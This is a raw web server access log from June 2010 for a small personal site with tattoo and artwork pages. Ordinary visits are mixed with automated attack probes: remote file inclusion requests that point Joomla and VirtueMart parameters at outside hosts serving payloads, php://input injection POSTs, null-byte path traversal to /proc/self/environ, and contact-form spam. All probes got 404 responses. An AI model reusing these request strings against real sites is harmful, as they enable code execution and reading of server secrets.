66.246.218.140 - - [28/Jun/2010:19:03:31 -0500] "GET /logs/access_log.1266710400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seowlyx.com/includes/.logs? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
66.246.218.140 - - [28/Jun/2010:19:03:31 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seowlyx.com/includes/.logs? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
66.246.218.140 - - [28/Jun/2010:19:03:31 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seowlyx.com/includes/.logs? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
203.94.177.94 - - [28/Jun/2010:19:07:36 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.94.177.94 - - [28/Jun/2010:19:07:57 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
203.94.177.94 - - [28/Jun/2010:19:07:57 -0500] "GET /logs/access_log.1276473600///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
85.236.50.166 - - [28/Jun/2010:19:09:46 -0500] "POST /e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:09:46 -0500] "POST /e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
24.0.178.157 - - [28/Jun/2010:19:10:12 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=15&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3DBert%2BGrimm%26um%3D1%26hl%3Den%26safe%3Doff%26sa%3DN%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:12 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:25 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:26 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:45 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:45 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:45 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:45 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:45 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:46 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:46 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:46 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:46 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:46 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:10:46 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:11:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:11:20 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
207.200.116.6 - - [28/Jun/2010:19:11:43 -0500] "GET /artwork/unclesamwhilrligig.jpg HTTP/1.1" 200 59934 "http://www.bing.com/images/search?q=whirligigs&sk=AS1&pq=whirli&sp=2&sc=8-6&cbir=vw&mid=75D2072A055F02B6EF1A90D87C9DEC1B90FFFCE1""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
85.236.50.166 - - [28/Jun/2010:19:12:14 -0500] "POST /index.php?theme_path=php://input HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:12:14 -0500] "POST /index.php?theme_path=php://input HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
24.0.178.157 - - [28/Jun/2010:19:12:36 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:36 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "http://tomdolan.pconline.com/tattoo/links.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
85.236.50.166 - - [28/Jun/2010:19:12:44 -0500] "POST /logs/access_log.1266710400/e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:12:44 -0500] "POST /e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:12:44 -0500] "POST /logs/e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
24.0.178.157 - - [28/Jun/2010:19:12:46 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:46 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:46 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:46 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:46 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:47 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:47 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:47 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:47 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:47 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:12:47 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
85.236.50.166 - - [28/Jun/2010:19:12:47 -0500] "POST /logs/access_log.1266710400/e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 351 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:12:47 -0500] "POST /e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:12:48 -0500] "POST /logs/e107/e107_handlers/secure_img_render.php?p=php://input HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
24.0.178.157 - - [28/Jun/2010:19:13:02 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:03 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:03 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:03 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:03 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:13:03 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
89.108.64.192 - - [28/Jun/2010:19:14:03 -0500] "GET /logs/access_log.1274832000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
89.108.64.192 - - [28/Jun/2010:19:14:03 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
89.108.64.192 - - [28/Jun/2010:19:14:04 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
174.120.234.211 - - [28/Jun/2010:19:14:18 -0500] "GET /logs/access_log.1266710400///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://yourbestdate.info/banners/.xml/.id? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:19:14:18 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://yourbestdate.info/banners/.xml/.id? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:19:14:19 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://yourbestdate.info/banners/.xml/.id? HTTP/1.1" 404 341 "-""libwww-perl/5.831"
64.185.238.35 - - [28/Jun/2010:19:15:16 -0500] "GET /index2.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.205.67.73 - - [28/Jun/2010:19:16:01 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [28/Jun/2010:19:16:02 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
24.0.178.157 - - [28/Jun/2010:19:16:38 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:16:38 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://tomdolan.pconline.com/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:16:38 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://tomdolan.pconline.com/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
24.0.178.157 - - [28/Jun/2010:19:16:38 -0500] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://tomdolan.pconline.com/""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
89.108.64.192 - - [28/Jun/2010:19:17:16 -0500] "GET /logs/access_log.1274572800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
85.236.50.166 - - [28/Jun/2010:19:17:50 -0500] "POST //?theme_path=php://input HTTP/1.1" 404 285 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [28/Jun/2010:19:17:52 -0500] "POST //?theme_path=php://input HTTP/1.1" 404 285 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:58 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:58 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
109.169.46.7 - - [28/Jun/2010:19:18:58 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.15.152.183 - - [28/Jun/2010:19:20:32 -0500] "GET //linkadmin.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
201.62.99.157 - - [28/Jun/2010:19:20:49 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.15.152.183 - - [28/Jun/2010:19:23:10 -0500] "GET //linkadmin.php?page=http://www.porto.napoli.it/xml/bond1.php HTTP/1.1" 404 298 "-""libwww-perl/5.65"
64.185.238.35 - - [28/Jun/2010:19:23:12 -0500] "GET /logs/access_log.1275091200/index2.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.185.238.35 - - [28/Jun/2010:19:23:12 -0500] "GET /index2.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.185.238.35 - - [28/Jun/2010:19:23:13 -0500] "GET /logs/index2.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.185.238.35 - - [28/Jun/2010:19:23:20 -0500] "GET /logs/access_log.1276214400/index2.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
89.208.141.110 - - [28/Jun/2010:19:31:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.208.141.110 - - [28/Jun/2010:19:31:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.208.141.110 - - [28/Jun/2010:19:31:52 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.46.199.185 - - [28/Jun/2010:19:32:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.15.152.183 - - [28/Jun/2010:19:33:54 -0500] "GET /logs/access_log.1276128000//linkadmin.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:19:33:54 -0500] "GET //linkadmin.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
67.15.152.183 - - [28/Jun/2010:19:33:54 -0500] "GET /logs//linkadmin.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.65"
